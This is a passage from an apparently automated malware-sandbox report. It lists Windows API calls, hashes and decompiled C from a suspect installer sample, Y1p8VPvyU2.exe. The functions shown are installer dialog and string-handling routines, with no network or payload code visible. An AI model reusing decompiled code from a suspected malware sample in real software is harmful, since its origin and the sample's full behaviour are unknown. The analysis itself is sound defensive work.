                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 004047E1
                                      • SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 0040480C
                                      • SendMessageA.USER32(?,00001100,00000000,?), ref: 00404820
                                      • GetWindowLongA.USER32 ref: 0040484F
                                      • SetWindowLongA.USER32(?,000000F0,00000000), ref: 0040485D
                                      • ShowWindow.USER32(?,00000005), ref: 0040486E
                                      • SendMessageA.USER32(?,00000419,00000000,?), ref: 00404971
                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 004049D6
                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 004049EB
                                      • SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404A0F
                                      • SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404A35
                                      • ImageList_Destroy.COMCTL32(?), ref: 00404A4A
                                      • GlobalFree.KERNEL32 ref: 00404A5A
                                      • SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404ACA
                                      • SendMessageA.USER32(?,00001102,00000410,?), ref: 00404B73
                                      • SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404B82
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404BA2
                                      • ShowWindow.USER32(?,00000000), ref: 00404BF0
                                      • GetDlgItem.USER32 ref: 00404BFB
                                      • ShowWindow.USER32(00000000), ref: 00404C02
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                      • String ID: $M$N$xr
                                      • API String ID: 1638840714-180083718
                                      • Opcode ID: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
                                      • Instruction ID: c130209c976f96ebc92895edf0e38420b46f59adec9cf70198d20430cf8fc3c6
                                      • Opcode Fuzzy Hash: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
                                      • Instruction Fuzzy Hash: 1E02AEB0A00209AFDB20DF95DD45AAE7BB5FB84314F10817AF611BA2E1C7789D42CF58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404E07, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 96%
                                      			E00404E07(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				unsigned int _t93;
				int _t94;
				int _t95;
				long _t98;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x42e344; // 0x0
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404D9B, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							__eflags = _a12 - _t154;
							if(_a12 != _t154) {
								goto L20;
							}
							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
							__eflags = _t87 - _t149;
							_a8 = _t87;
							if(_t87 <= _t149) {
								L37:
								return 0;
							}
							_t160 = CreatePopupMenu();
							AppendMenuA(_t160, _t149, 1, E0040594D(_t149, _t154, _t160, _t149, 0xffffffe1));
							_t92 = _a16;
							__eflags = _t92 - 0xffffffff;
							if(_t92 != 0xffffffff) {
								_t150 = _t92;
								_t93 = _t92 >> 0x10;
								__eflags = _t93;
								_t94 = _t93;
							} else {
								GetWindowRect(_t154,  &_v28);
								_t150 = _v28.left;
								_t94 = _v28.top;
							}
							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
							_t162 = 1;
							__eflags = _t95 - 1;
							if(_t95 == 1) {
								_v60 = _t149;
								_v48 = 0x429fd8;
								_v44 = 0xfff;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
									__eflags = _a4 - _t149;
									_t162 = _t162 + _t98 + 2;
								} while (_a4 != _t149);
								OpenClipboard(_t149);
								EmptyClipboard();
								_t101 = GlobalAlloc(0x42, _t162);
								_a4 = _t101;
								_t163 = GlobalLock(_t101);
								do {
									_v48 = _t163;
									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
									 *_t164 = 0xa0d;
									_t163 = _t164 + 2;
									_t149 = _t149 + 1;
									__eflags = _t149 - _a8;
								} while (_t149 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L37;
						}
						__eflags =  *0x42e32c - _t149; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x42eb68, 8);
							__eflags =  *0x42ebec - _t149; // 0x0
							if(__eflags == 0) {
								E00404CC9( *((intOrPtr*)( *0x4297a8 + 0x34)), _t149);
							}
							E00403CB6(1);
							goto L25;
						}
						 *0x4293a0 = 2;
						E00403CB6(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00403D44(_a8, _a12, _a16);
						}
						ShowWindow( *0x42e330, _t149);
						ShowWindow(_t154, 8);
						E00403D12(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x42eb70; // 0x720250
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x42e330 = GetDlgItem(_a4, 0x403);
				 *0x42e328 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x42e344 = _t127;
				_v8 = _t127;
				E00403D12( *0x42e330);
				 *0x42e334 = E0040456B(4);
				 *0x42e34c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403CDD(_a4);
				if(( *0x42eb78 & 0x00000003) != 0) {
					ShowWindow( *0x42e330, _t149);
					if(( *0x42eb78 & 0x00000002) != 0) {
						 *0x42e330 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403D12( *0x42e328);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x42eb78 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}


































                                      0x00404e10
                                      0x00404e16
                                      0x00404e1f
                                      0x00404e22
                                      0x00404fb3
                                      0x00404fba
                                      0x00404fde
                                      0x00404fde
                                      0x00404fe4
                                      0x00404ff1
                                      0x0040500f
                                      0x0040500f
                                      0x00405016
                                      0x0040506d
                                      0x0040506d
                                      0x00405071
                                      0x00000000
                                      0x00000000
                                      0x00405073
                                      0x00405076
                                      0x00000000
                                      0x00000000
                                      0x00405080
                                      0x00405086
                                      0x00405088
                                      0x0040508b
                                      0x00405184
                                      0x00000000
                                      0x00405184
                                      0x0040509a
                                      0x004050a6
                                      0x004050ac
                                      0x004050af
                                      0x004050b2
                                      0x004050c7
                                      0x004050ca
                                      0x004050ca
                                      0x004050cd
                                      0x004050b4
                                      0x004050b9
                                      0x004050bf
                                      0x004050c2
                                      0x004050c2
                                      0x004050dd
                                      0x004050e5
                                      0x004050e6
                                      0x004050e8
                                      0x004050f1
                                      0x004050f4
                                      0x004050fb
                                      0x00405102
                                      0x0040510a
                                      0x0040510a
                                      0x00405118
                                      0x0040511e
                                      0x00405121
                                      0x00405121
                                      0x00405128
                                      0x0040512e
                                      0x00405137
                                      0x0040513e
                                      0x00405147
                                      0x00405149
                                      0x0040514c
                                      0x0040515b
                                      0x0040515d
                                      0x00405163
                                      0x00405164
                                      0x00405165
                                      0x00405165
                                      0x0040516d
                                      0x00405178
                                      0x0040517e
                                      0x0040517e
                                      0x00000000
                                      0x004050e8
                                      0x00405018
                                      0x0040501e
                                      0x0040504e
                                      0x00405050
                                      0x00405056
                                      0x00405061
                                      0x00405061
                                      0x00405068
                                      0x00000000
                                      0x00405068
                                      0x00405022
                                      0x0040502c
                                      0x00000000
                                      0x00404ff3
                                      0x00404ff3
                                      0x00404ff9
                                      0x00405031
                                      0x00000000
                                      0x0040503a
                                      0x00405002
                                      0x00405007
                                      0x0040500a
                                      0x00000000
                                      0x0040500a
                                      0x00404ff1
                                      0x00404e28
                                      0x00404e2c
                                      0x00404e35
                                      0x00404e3c
                                      0x00404e3f
                                      0x00404e42
                                      0x00404e45
                                      0x00404e46
                                      0x00404e47
                                      0x00404e60
                                      0x00404e63
                                      0x00404e6d
                                      0x00404e7c
                                      0x00404e84
                                      0x00404e8c
                                      0x00404e91
                                      0x00404e94
                                      0x00404ea0
                                      0x00404ea9
                                      0x00404eb2
                                      0x00404ed5
                                      0x00404edb
                                      0x00404eec
                                      0x00404ef1
                                      0x00404eff
                                      0x00404f0d
                                      0x00404f0d
                                      0x00404f12
                                      0x00404f20
                                      0x00404f20
                                      0x00404f25
                                      0x00404f28
                                      0x00404f2d
                                      0x00404f39
                                      0x00404f42
                                      0x00404f4f
                                      0x00404f5e
                                      0x00404f51
                                      0x00404f56
                                      0x00404f56
                                      0x00404f6a
                                      0x00404f6a
                                      0x00404f7e
                                      0x00404f87
                                      0x00404f90
                                      0x00404fa0
                                      0x00404fac
                                      0x00404fac
                                      0x00000000

                                      APIs
                                      • GetDlgItem.USER32 ref: 00404E66
                                      • GetDlgItem.USER32 ref: 00404E75
                                      • GetClientRect.USER32 ref: 00404EB2
                                      • GetSystemMetrics.USER32 ref: 00404EBA
                                      • SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00404EDB
                                      • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00404EEC
                                      • SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00404EFF
                                      • SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00404F0D
                                      • SendMessageA.USER32(?,00001024,00000000,?), ref: 00404F20
                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00404F42
                                      • ShowWindow.USER32(?,00000008), ref: 00404F56
                                      • GetDlgItem.USER32 ref: 00404F77
                                      • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00404F87
                                      • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00404FA0
                                      • SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00404FAC
                                      • GetDlgItem.USER32 ref: 00404E84
                                        • Part of subcall function 00403D12: SendMessageA.USER32(00000028,?,00000001,00403B43), ref: 00403D20
                                      • GetDlgItem.USER32 ref: 00404FC9
                                      • CreateThread.KERNEL32 ref: 00404FD7
                                      • CloseHandle.KERNEL32(00000000), ref: 00404FDE
                                      • ShowWindow.USER32(00000000), ref: 00405002
                                      • ShowWindow.USER32(00000000,00000008), ref: 00405007
                                      • ShowWindow.USER32(00000008), ref: 0040504E
                                      • SendMessageA.USER32(00000000,00001004,00000000,00000000), ref: 00405080
                                      • CreatePopupMenu.USER32 ref: 00405091
                                      • AppendMenuA.USER32 ref: 004050A6
                                      • GetWindowRect.USER32 ref: 004050B9
                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004050DD
                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405118
                                      • OpenClipboard.USER32(00000000), ref: 00405128
                                      • EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 0040512E
                                      • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405137
                                      • GlobalLock.KERNEL32 ref: 00405141
                                      • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405155
                                      • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 0040516D
                                      • SetClipboardData.USER32 ref: 00405178
                                      • CloseClipboard.USER32 ref: 0040517E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                      • String ID: {
                                      • API String ID: 590372296-366298937
                                      • Opcode ID: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
                                      • Instruction ID: 6b58894f072d387ff385a1976498fa71d2bdad0bf2474ce794c2d1da48ffa65f
                                      • Opcode Fuzzy Hash: 3d08310bbd43469a5120837c1ff2279d190d817ca8ed5af4582344c2043299ca
                                      • Instruction Fuzzy Hash: 48A14971900208BFEB219F61DD89AAE7F79FB08355F00407AFA05BA1A0C7755E41DFA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040411B, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 266stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 78%
                                      			E0040411B(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				signed int* _t145;
				intOrPtr _t147;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x4297a8;
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x42f000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E004051D0(0x3fb, _t162);
					E00405B89(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004051D0(0x3fb, _t162);
							if(E004054FF(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E0040592B(0x428fa0, _t162);
							_t145 = 0;
							_t86 = E00405C49(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E0040592B(0x428fa0, _t162);
								_t88 = E004054B2(0x428fa0);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x428fa0,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x428fa0) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x428fa0,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E00405465(0x428fa0) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x428fa0) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E0040456B(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								_t147 =  *0x42e33c; // 0x7278ea
								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
									E004044B6(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x428f90);
									} else {
										E004044B6(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x42ec04 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403CFF(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x429fc4 == _t145) {
									E004040B0();
								}
								 *0x429fc4 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x429fd8;
							_v56 = E00404450;
							_v52 = _t162;
							_v64 = E0040594D(0x3fb, 0x429fd8, _t162, 0x4293a8, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E0040541E(_t162);
								_t124 =  *0x42eb70; // 0x720250
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E0040594D(0x3fb, 0x429fd8, _t162, 0, _t125);
									if(lstrcmpiA(0x42db00, 0x429fd8) != 0) {
										lstrcatA(_t162, 0x42db00);
									}
								}
								 *0x429fc4 =  &(( *0x429fc4)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E0040548B(_t162) != 0 && E004054B2(_t162) == 0) {
						E0040541E(_t162);
					}
					 *0x42e338 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403CDD(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403CDD(_t159);
					E00403D12(_v12);
					_t138 = E00405C49(7);
					if(_t138 == 0) {
						L53:
						return E00403D44(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}








































                                      0x00404121
                                      0x00404128
                                      0x00404134
                                      0x00404142
                                      0x0040414a
                                      0x0040414e
                                      0x00404154
                                      0x00404154
                                      0x00404160
                                      0x004041d4
                                      0x004041db
                                      0x004042b0
                                      0x004042b7
                                      0x004042c6
                                      0x004042c6
                                      0x004042ca
                                      0x004042d0
                                      0x004042dd
                                      0x004042df
                                      0x004042df
                                      0x004042ed
                                      0x004042f2
                                      0x004042f5
                                      0x004042fc
                                      0x004042ff
                                      0x00404336
                                      0x00404338
                                      0x0040433e
                                      0x00404345
                                      0x00404347
                                      0x00404347
                                      0x00404363
                                      0x0040439f
                                      0x00000000
                                      0x00404365
                                      0x00404368
                                      0x0040437c
                                      0x0040437e
                                      0x00000000
                                      0x0040437e
                                      0x00404301
                                      0x00404305
                                      0x00404334
                                      0x00404334
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404307
                                      0x00404307
                                      0x00404314
                                      0x00404319
                                      0x00000000
                                      0x00000000
                                      0x0040431d
                                      0x0040431f
                                      0x0040431f
                                      0x0040432a
                                      0x0040432d
                                      0x00404332
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00404332
                                      0x0040438d
                                      0x00404394
                                      0x0040439b
                                      0x004043a2
                                      0x004043a2
                                      0x004043a7
                                      0x004043a9
                                      0x004043b1
                                      0x004043b7
                                      0x004043b7
                                      0x004043be
                                      0x004043c7
                                      0x004043d1
                                      0x004043d9
                                      0x004043ef
                                      0x004043db
                                      0x004043df
                                      0x004043df
                                      0x004043d9
                                      0x004043f4
                                      0x004043f9
                                      0x004043fe
                                      0x00404407
                                      0x00404407
                                      0x00404410
                                      0x00404412
                                      0x00404412
                                      0x0040441e
                                      0x00404426
                                      0x00404430
                                      0x00404430
                                      0x00404435
                                      0x00000000
                                      0x00404435
                                      0x004042ff
                                      0x004042b9
                                      0x004042c0
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x004042c0
                                      0x004041e1
                                      0x004041e7
                                      0x00404201
                                      0x00404206
                                      0x00404210
                                      0x00404217
                                      0x00404226
                                      0x00404229
                                      0x0040422c
                                      0x00404233
                                      0x0040423b
                                      0x0040423e
                                      0x00404242
                                      0x00404249
                                      0x00404251
                                      0x004042a9
                                      0x00404253
                                      0x00404254
                                      0x0040425b
                                      0x00404260
                                      0x00404265
                                      0x0040426d
                                      0x0040427a
                                      0x0040428e
                                      0x00404292
                                      0x00404292
                                      0x0040428e
                                      0x00404297
                                      0x004042a2
                                      0x004042a2
                                      0x00404251
                                      0x00000000
                                      0x00404206
                                      0x004041f4
                                      0x00000000
                                      0x00000000
                                      0x004041fa
                                      0x00000000
                                      0x00404162
                                      0x00404162
                                      0x0040416e
                                      0x00404178
                                      0x00404185
                                      0x00404185
                                      0x0040418b
                                      0x00404194
                                      0x0040419d
                                      0x004041a0
                                      0x004041a3
                                      0x004041ab
                                      0x004041ae
                                      0x004041b1
                                      0x004041b9
                                      0x004041c0
                                      0x004041c7
                                      0x0040443b
                                      0x0040444d
                                      0x0040444d
                                      0x004041d2
                                      0x00000000
                                      0x004041d2

                                      APIs
                                      • GetDlgItem.USER32 ref: 00404167
                                      • SetWindowTextA.USER32(?,?), ref: 00404194
                                      • SHBrowseForFolderA.SHELL32(?,004293A8,?), ref: 00404249
                                      • CoTaskMemFree.OLE32(00000000), ref: 00404254
                                      • lstrcmpiA.KERNEL32(hqliygqis,00429FD8,00000000,?,?), ref: 00404286
                                      • lstrcatA.KERNEL32(?,hqliygqis), ref: 00404292
                                      • SetDlgItemTextA.USER32 ref: 004042A2
                                        • Part of subcall function 004051D0: GetDlgItemTextA.USER32 ref: 004051E3
                                        • Part of subcall function 00405B89: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                                        • Part of subcall function 00405B89: CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                                        • Part of subcall function 00405B89: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                                        • Part of subcall function 00405B89: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\Y1p8VPvyU2.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                                      • GetDiskFreeSpaceA.KERNEL32(00428FA0,?,?,0000040F,?,00428FA0,00428FA0,?,00000000,00428FA0,?,?,000003FB,?), ref: 0040435B
                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404376
                                      • SetDlgItemTextA.USER32 ref: 004043EF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.305179920.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.305175348.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305188450.0000000000407000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305200572.0000000000409000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305230729.000000000042C000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305249216.0000000000434000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.305255084.0000000000437000.00000002.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                      • String ID: A$C:\Users\user\AppData\Local\Temp$hqliygqis$xr
                                      • API String ID: 2246997448-1202090729
                                      • Opcode ID: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
                                      • Instruction ID: a19ed3a57cd3ea7516059bd6de19f3cb3834a8abb31794935fb739ca8bc8323d
                                      • Opcode Fuzzy Hash: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
                                      • Instruction Fuzzy Hash: E09151B1A00218ABDB11DFA1DD85AEF7BB8EF84315F10407BFA04B62D1D77C99418B69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040594D, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 195stringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 74%
                                      			E0040594D(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				signed int _v28;
				signed int _t36;
				CHAR* _t37;
				signed char _t39;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t68;
				intOrPtr _t72;
				signed int _t73;
				signed char _t74;
				intOrPtr _t77;
				char _t81;
				void* _t83;
				CHAR* _t84;
				void* _t86;
				signed int _t93;
				signed int _t95;
				void* _t96;

				_t86 = __esi;
				_t83 = __edi;
				_t64 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t77 =  *0x42e33c; // 0x7278ea
					_t36 =  *(_t77 - 4 + _t36 * 4);
				}
				_t72 =  *0x42eb98; // 0x725d88
				_t73 = _t72 + _t36;
				_t37 = 0x42db00;
				_push(_t64);
				_push(_t86);
				_push(_t83);
				_t84 = 0x42db00;
				if(_a4 - 0x42db00 < 0x800) {
					_t84 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t81 =  *_t73;
					if(_t81 == 0) {
						break;
					}
					__eflags = _t84 - _t37 - 0x400;
					if(_t84 - _t37 >= 0x400) {
						break;
					}
					_t73 = _t73 + 1;
					__eflags = _t81 - 0xfc;
					_a8 = _t73;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t84 = _t81;
							_t84 =  &(_t84[1]);
							__eflags = _t84;
						} else {
							 *_t84 =  *_t73;
							_t84 =  &(_t84[1]);
							_t73 = _t73 + 1;
						}
						continue;
					}
					_t39 =  *(_t73 + 1);
					_t74 =  *_t73;
					_a8 = _a8 + 2;
					_v20 = _t39;
					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
					_t68 = _t74;
					_t40 = _t39 | 0x00000080;
					__eflags = _t81 - 0xfe;
					_v28 = _t68;
					_v24 = _t74 | 0x00000080;
					_v16 = _t40;
					if(_t81 != 0xfe) {
						__eflags = _t81 - 0xfd;
						if(_t81 != 0xfd) {
							__eflags = _t81 - 0xff;
							if(_t81 == 0xff) {
								__eflags = (_t40 | 0xffffffff) - _t93;
								E0040594D(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
							}
							L41:
							_t41 = lstrlenA(_t84);
							_t73 = _a8;
							_t84 =  &(_t84[_t41]);
							_t37 = 0x42db00;
							continue;
						}
						__eflags = _t93 - 0x1d;
						if(_t93 != 0x1d) {
							__eflags = (_t93 << 0xa) + 0x42f000;
